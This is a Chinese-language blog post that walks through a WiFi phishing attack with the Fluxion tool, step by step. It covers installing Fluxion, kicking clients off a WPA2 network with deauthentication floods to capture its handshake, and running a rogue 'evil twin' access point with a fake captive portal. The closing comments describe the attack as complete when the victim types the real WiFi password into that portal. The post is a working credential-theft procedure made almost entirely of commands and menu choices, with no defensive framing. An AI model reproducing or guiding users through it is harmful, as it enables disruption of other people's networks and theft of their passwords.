wifi钓鱼

Fluxion工具

下载地址与安装

git clone https://github.com/shivers0x72/fluxion.git
./fluxion.sh -i
//选择 17 中文

步骤

//开始前插上可监听无线网卡

./fluxion.sh

'''
[*] 请选择一个攻击方式

                             ESSID: "[N/A]" / [N/A]                                           
                           Channel:  [N/A]                                                    
                             BSSID:  [N/A] ([N/A])                                 

        [1] 专属门户 创建一个“邪恶的双胞胎”接入点。
        [2] Handshake Snooper 检索WPA/WPA2加密散列。
        [3] 返回 
'''
2

'''
[*] 选择要扫描的信道                                                                          
                                                                                              
        [1] 扫描所有信道  (2.4GHz)                                                            
        [2] 扫描所有信道  (5GHz)                                                              
        [3] 扫描所有信道  (2.4GHz & 5Ghz)                                                     
        [4] 扫描指定信道                                                                      
        [5] 返回 
'''
1//捕获到目标wifi后ctrl+c停止

'''
[012] shivers                                      100% -25   0 11 WPA2      FC:AB:90:A9:E2:59
'''
12

'''
[*] 为目标跟踪选择无线接口.
[*] 可能需要选择专用接口.
[*] 如果您不确定,请选择"跳过"!

[1] wlan0    [*] D-Link Corp. DWA-140 RangeBooster N Adapter(rev.B3) [Ralink RT5372]          
[2] 跳过                                                                                  
[3] 重试                                                                                  
[4] 返回  
'''
2

'''
[*] 选择一种方式来检查握手包获取状态

        [1] 监听模式 (被动)
        [2] aireplay-ng 解除认证方式 (侵略性)
        [3] mdk4 解除认证方式 (侵略性)
        [4] 返回

'''
3//2和3都可以

'''
[*] 选择Hash的验证方法

        [1] aircrack-ng 验证 (不推荐)
        [2] cowpatty 验证 (推荐用这个)
        [3] 返回

'''
2

'''
[*] 每隔多久检查一次握手包

        [1] 每30秒钟 (推荐).
        [2] 每60秒钟
        [3] 每90秒钟
        [4] 返回

'''
1

'''
[*] 如何进行验证?

        [1] Asynchronously (fast systems only).
        [2] Synchronously (推荐).
        [3] 返回

'''
2

//开始抓包..
//可以发现连上的wifi网络断开

'''
[*] Handshake Snooper 正在进行攻击......

        [1] 选择启动攻击方式
        [2] 退出
'''
1

'''
[*] 请选择一个攻击方式

                             ESSID: "shivers" / WPA2                                          
                           Channel:  11                                                       
                             BSSID:  FC:AB:90:A9:E2:59 ([N/A])                          

        [1] 专属门户 创建一个“邪恶的双胞胎”接入点。
        [2] Handshake Snooper 检索WPA/WPA2加密散列。
        [3] 返回 
'''
1

'''
[*] Fluxion正在瞄准上面的接入点.
[*] 继续这个目标? [Y/n] 
'''
y

'''
[*] 为目标跟踪选择无线接口.
[*] 可能需要选择专用接口.
[*] 如果您不确定,请选择"跳过"!

[1] wlan0    [*] D-Link Corp. DWA-140 RangeBooster N Adapter(rev.B3) [Ralink RT5372]          
[2] 跳过                                                                                  
[3] 重试                                                                                  
[4] 返回  
'''
2

'''
[*] 为接入点选择一个接口

[1] docker0  [+] D-Link Corp. DWA-140 RangeBooster N Adapter(rev.B3) [Ralink RT5372]          
[2] eth0     [-] Advanced Micro Devices, Inc. [AMD] 79c970 [PCnet32 LANCE] (rev 10)           
[3] wlan0    [*] D-Link Corp. DWA-140 RangeBooster N Adapter(rev.B3) [Ralink RT5372]          
[4] 重试                                                                                  
[5] 返回   
'''
3

'''
[*] Select a method of deauthentication

[1] mdk4
[2] aireplay
[3] mdk3
'''
3
'''
[*] 选择一个接入点

                             ESSID: "shivers" / WPA2                                          
                           Channel:  11                                                       
                             BSSID:  FC:AB:90:A9:E2:59 ([N/A])                          

        [1] 流氓 AP - hostapd (推荐)
        [2] 流氓 AP - airbase-ng (缓慢)
        [3] 返回
'''
1

'''
[*] 请选择验证密码方式

                             ESSID: "shivers" / WPA2                                          
                           Channel:  11                                                       
                             BSSID:  FC:AB:90:A9:E2:59 ([N/A])                          

        [1] hash - cowpatty
        [2] hash - aircrack-ng (default, unreliable)
        [3] 返回
'''
1

'''
[*] 发现目标热点的Hash文件.
[*] 你想要使用这个文件吗?

        [1] 使用抓取到的hash文件
        [2] 指定hash路径
        [3] 握手包目录(重新扫描)
        [4] 返回
'''
1

'''
[*] 选择Hash的验证方法

                             ESSID: "shivers" / WPA2                                          
                           Channel:  11                                                       
                             BSSID:  FC:AB:90:A9:E2:59 ([N/A])                          

        [1] aircrack-ng 验证 (不推荐)
        [2] cowpatty 验证 (推荐用这个)
'''
2

'''
[*] 选择钓鱼认证门户的SSL证书来源

        [1] 创建SSL证书
        [2] 检测SSL证书 (再次搜索)
        [3] 没有证书 (disable SSL)
        [4] 返回
'''
1

'''
[*] 为流氓网络选择Internet连接类型

        [1] 断开原网络 (推荐)
        [2] 仿真
        [3] 返回
'''
1

'''
 [03] 通用认证网页                              Chinese
'''
3

//出现六个窗口,目标wifi断开
//连接同名钓鱼WiFi时就会弹出认证窗口
//直到目标输入正确密码,完成一次攻击

posted @ 2021-02-01 09:08  Shivers0x72  阅读(568)  评论(0编辑  收藏  举报